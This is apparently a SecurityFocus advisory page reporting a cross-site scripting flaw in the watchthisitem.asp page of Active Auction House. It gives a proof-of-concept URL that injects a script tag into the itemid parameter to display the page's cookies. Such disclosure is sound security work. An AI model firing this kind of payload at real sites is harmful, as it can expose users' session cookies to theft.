Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Active Auction House WatchThisItem.ASP Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&amp%3baccountid=







 

Privacy Statement
Copyright 2008, SecurityFocus